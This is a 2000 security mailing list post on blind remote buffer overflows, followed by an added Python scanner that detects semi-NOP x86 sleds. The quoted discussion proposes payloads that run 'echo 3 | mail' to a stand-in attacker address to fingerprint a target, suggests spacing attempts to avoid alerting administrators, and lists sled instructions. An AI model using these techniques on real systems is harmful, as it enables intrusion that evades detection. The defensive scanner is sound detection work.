Vulnerability Development mailing list archives
Re: Blind Remote Buffer Overflow
From: matej () POBOX SK (matej)
Date: Tue, 2 May 2000 08:24:46 +0200
On Mon, May 01, 2000 at 05:59:05PM -0700, Blue Boar wrote:
> Some people have mentioned some ways to try to find a vulnerability
> remotely. Now, let's say you, using some way, have determined you can
> rewrite EIP, PC (or whatever it's called on your architecture). What
> now to do to detect operating system and architecture?
>
> In many cases, you will have more than one shot at trying your buffer
> overflow. One possibility is just trying them all. If the service
> doesn't auto-restart, then try each arch a week apart, so the admin
> doesn't get suspicious.
...or try in one shot 3 bufflows for 3 hw platforms :-)
> a number of variants (as an example: Linux/i386, Linux/sparc,
> Windows/i386), each of which does something like
> "echo 3 | mail badguy () test com". Depending upon what mail you
> actually get back, you know that the architecture is at least quite
> compatible with the environments that return an answer.
>
> Who knows their x86 and Sparc opcodes really well?
On x86 I can find a couple of such instructions, ranging from completely NOP-like to some form of semi-NOPs. Just think of 'mov eax, eax' or 'jmp $+length_of_instr', or take some of the semi-NOPs: 'and eax, eax' (changes flags, as well as 'or' etc.), and think about some instruction pairs, like 'cmc; cmc' (complement carry, twice ;-). However, I know _nothing_ about the sparc instr set...

matej
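From the defender's side, the interesting consequence of matej's list is that a sled built from these semi-NOPs will not trip a naive "string of 0x90" signature. The scanner below is an added example, not code from the thread or from any of its posters: it encodes the instructions matej names (plus plain NOP) as byte patterns and reports runs of them in a byte stream, as an IDS preprocessor would. The 32-bit Intel encodings are standard; the minimum run length of 8 and the sample packets are assumptions constructed for the example.

```python
# Added example (not from the original thread): scan a byte stream for runs
# of NOP-equivalent x86 instructions, the "semi-NOP" sled matej describes.
# Encodings are the standard 32-bit Intel ones; min_run and the sample
# packets below are constructed assumptions.

# Byte patterns that leave the general registers unchanged (some touch only
# the flags), mapped to their mnemonic. 'cmc' is only state-neutral when it
# appears twice, so it is matched as the pair F5 F5.
NOP_EQUIVALENTS = {
    b"\x90": "nop",
    b"\x89\xc0": "mov eax, eax",
    b"\x8b\xc0": "mov eax, eax",   # alternative encoding (8B /r form)
    b"\x21\xc0": "and eax, eax",   # changes flags only
    b"\x23\xc0": "and eax, eax",
    b"\x09\xc0": "or eax, eax",    # changes flags only
    b"\x0b\xc0": "or eax, eax",
    b"\xf5\xf5": "cmc; cmc",       # complement carry twice
    b"\xeb\x00": "jmp $+2",        # jump to the very next instruction
}

# Try longer patterns first so a two-byte instruction is never split.
_PATTERNS = sorted(NOP_EQUIVALENTS, key=len, reverse=True)


def _match_at(data: bytes, pos: int):
    """Return the NOP-equivalent pattern starting at pos, or None."""
    for pat in _PATTERNS:
        if data.startswith(pat, pos):
            return pat
    return None


def find_sleds(data: bytes, min_run: int = 8):
    """Return (offset, byte_length, instruction_count) for every run of at
    least min_run consecutive NOP-equivalent instructions in data.

    When a run is too short the scan restarts one byte later, so a sled of
    two-byte instructions is still found if the stream is entered at an odd
    offset.
    """
    found = []
    i = 0
    while i < len(data):
        start, pos, count = i, i, 0
        while True:
            pat = _match_at(data, pos)
            if pat is None:
                break
            pos += len(pat)
            count += 1
        if count >= min_run:
            found.append((start, pos - start, count))
            i = pos            # continue after the reported run
        else:
            i = start + 1      # short or no run: slide forward one byte
    return found


def decode_run(data: bytes, offset: int, length: int):
    """List the mnemonics of the NOP-equivalents that make up a found run."""
    mnemonics = []
    pos, end = offset, offset + length
    while pos < end:
        pat = _match_at(data, pos)
        mnemonics.append(NOP_EQUIVALENTS[pat])
        pos += len(pat)
    return mnemonics


# Constructed sample inputs: an innocuous ASCII prefix, then a mixed sled of
# the instructions discussed in the thread, then filler bytes.
SAMPLE_SLED = (b"\x90\x90\x90" + b"\x89\xc0" + b"\x21\xc0"
               + b"\xf5\xf5" + b"\xeb\x00" + b"\x90\x90")
SAMPLE_PACKET = b"USER " + SAMPLE_SLED + b"\x00\x00AAAA"
BENIGN_PACKET = b"USER alice\r\n"

if __name__ == "__main__":
    for off, ln, cnt in find_sleds(SAMPLE_PACKET):
        print(f"sled at offset {off}: {ln} bytes, {cnt} instructions")
        print("  ", decode_run(SAMPLE_PACKET, off, ln))
    print("benign:", find_sleds(BENIGN_PACKET))
```

Run it and the constructed packet reports one sled at offset 5 (13 bytes, 9 instructions) while the benign login line reports nothing. The table is deliberately small: a production check would cover far more register/encoding combinations, and the run threshold trades false positives on binary protocols against missed short sleds.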
Current thread:
- Re: Blind Remote Buffer Overflow, (continued)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Arturo Busleiman (Apr 30)
- Re: Blind Remote Buffer Overflow Ralph The Wonder Llama (May 01)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Reinier Heeres (May 02)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (May 02)
- Re: Blind Remote Buffer Overflow Jani Ollikainen (May 02)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Bluefish (May 01)
- Re: Blind Remote Buffer Overflow Marc (May 01)
- Re: Blind Remote Buffer Overflow Blue Boar (May 01)
- Re: Blind Remote Buffer Overflow matej (May 01)
- Re: Blind Remote Buffer Overflow Pavol Luptak (May 02)
- Ascii-x86 was: Blind Remote Buffer Overflow Bluefish (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Robert Collins (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Bill Weiss (May 03)
- firewall audit LEOW Chiun-Yi Jonathan (May 03)
- Re: firewall audit Ron DuFresne (May 03)
- Re: firewall audit antirez (May 04)
- Re: firewall audit Bennett Todd (May 04)
- Re: firewall audit Ron DuFresne (May 04)
- ethernet cards & promisc mode Security Team (May 03)